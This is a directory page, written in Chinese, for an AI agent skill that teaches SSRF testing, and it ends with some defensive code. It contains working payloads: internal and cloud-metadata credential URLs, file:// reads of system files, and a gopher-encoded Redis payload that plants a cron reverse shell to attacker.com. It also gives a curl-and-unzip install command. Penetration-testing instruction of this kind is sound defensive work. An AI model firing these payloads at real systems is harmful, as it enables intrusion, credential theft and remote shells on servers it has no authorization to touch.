MCP.directory

ssrf-testing

by Ed1s0nZ
4
0
Source

SSRF服务器端请求伪造测试的专业技能和方法论

Install

mkdir -p .claude/skills/ssrf-testing && curl -L -o skill.zip "https://mcp.directory/api/skills/download/2928" && unzip -o skill.zip -d .claude/skills/ssrf-testing && rm skill.zip

Installs to .claude/skills/ssrf-testing

About this skill

SSRF服务器端请求伪造测试

概述

SSRF(Server-Side Request Forgery)是一种利用服务器发起请求的漏洞,可以访问内网资源、进行端口扫描或绕过防火墙。本技能提供SSRF漏洞的检测、利用和防护方法。

漏洞原理

应用程序接受URL参数并请求该URL,攻击者可以控制请求的目标,导致:

  • 内网资源访问
  • 本地文件读取
  • 端口扫描
  • 绕过防火墙
  • 云服务元数据访问

测试方法

1. 识别SSRF输入点

常见功能:

  • URL预览/截图
  • 文件上传(远程URL)
  • Webhook回调
  • API代理
  • 数据导入
  • 图片处理
  • PDF生成

2. 基础检测

测试本地回环:

http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]

测试内网IP:

http://192.168.1.1
http://10.0.0.1
http://172.16.0.1

测试文件协议:

file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts

3. 绕过技术

IP地址编码:

127.0.0.1 → 2130706433 (十进制)
127.0.0.1 → 0x7f000001 (十六进制)
127.0.0.1 → 0177.0.0.1 (八进制)

域名解析绕过:

127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me

URL重定向:

http://attacker.com/redirect → http://127.0.0.1

协议混淆:

http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1

利用技术

内网探测

端口扫描:

# 使用Burp Intruder
http://127.0.0.1:22
http://127.0.0.1:3306
http://127.0.0.1:6379
http://127.0.0.1:8080
http://127.0.0.1:9200

识别服务:

  • 响应时间差异
  • 错误信息
  • HTTP状态码
  • 响应内容

云服务元数据

AWS EC2:

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

Google Cloud:

http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/

Azure:

http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01

阿里云:

http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/

内网应用攻击

访问管理后台:

http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin

Redis未授权访问:

http://127.0.0.1:6379
# 然后发送Redis命令

FastCGI攻击:

http://127.0.0.1:9000
# 利用FastCGI协议执行命令

高级利用

Gopher协议

发送任意协议数据:

gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a

Redis命令执行:

gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

Dict协议

端口扫描和信息收集:

dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status

文件协议

读取本地文件:

file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ

工具使用

SSRFmap

# 基础扫描
python3 ssrfmap.py -r request.txt -p url

# 端口扫描
python3 ssrfmap.py -r request.txt -p url -m portscan

# 云元数据
python3 ssrfmap.py -r request.txt -p url -m cloud

Gopherus

# 生成Gopher payload
python gopherus.py --exploit redis

Burp Collaborator

检测盲SSRF:

http://burpcollaborator.net
# 观察是否有DNS/HTTP请求

验证和报告

验证步骤

  1. 确认可以控制请求目标
  2. 验证内网资源访问或端口扫描
  3. 评估影响范围(内网渗透、数据泄露等)
  4. 记录完整的POC

报告要点

  • 漏洞位置和输入参数
  • 可访问的内网资源或端口
  • 完整的利用步骤和PoC
  • 修复建议(URL白名单、禁用危险协议等)

防护措施

推荐方案

  1. URL白名单

    ALLOWED_DOMAINS = ['example.com', 'cdn.example.com']
parsed = urlparse(url)
if parsed.netloc not in ALLOWED_DOMAINS:
    raise ValueError("Domain not allowed")

  2. 禁用危险协议

    • 只允许http/https
    • 禁止file://、gopher://、dict://等

  3. IP地址过滤

    import ipaddress

def is_internal_ip(ip):
    return ipaddress.ip_address(ip).is_private or \
           ipaddress.ip_address(ip).is_loopback

  4. 使用DNS解析验证

    • 解析域名获取IP
    • 验证IP是否在内网范围

  5. 网络隔离

    • 限制服务器出网权限
    • 使用代理服务器

注意事项

  • 仅在授权测试环境中进行
  • 避免对内网系统造成影响
  • 注意不同协议的支持情况
  • 测试时注意请求频率,避免触发防护

More by Ed1s0nZ

View all skills by Ed1s0nZ

xpath-injection-testing

Ed1s0nZ

XPath注入漏洞测试的专业技能和方法论

00

csrf-testing

Ed1s0nZ

CSRF跨站请求伪造测试的专业技能和方法论

00

file-upload-testing

Ed1s0nZ

文件上传漏洞测试的专业技能和方法论

10

cloud-security-audit

Ed1s0nZ

云安全审计的专业技能和方法论

10

xss-testing

Ed1s0nZ

XSS跨站脚本攻击测试的专业技能

20

api-security-testing

Ed1s0nZ

API安全测试的专业技能和方法论

30

You might also like

flutter-development

aj-geddes

Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.

643969

drawio-diagrams-enhanced

jgtolentino

Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.

591705

ui-ux-pro-max

nextlevelbuilder

"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."

318398

godot

bfollington

This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.

339397

nano-banana-pro

garg-aayush

Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.

451339

fastapi-templates

wshobson

Create production-ready FastAPI projects with async patterns, dependency injection, and comprehensive error handling. Use when building new FastAPI applications or setting up backend API projects.

304231

Stay ahead of the MCP ecosystem

Get weekly updates on new skills and servers.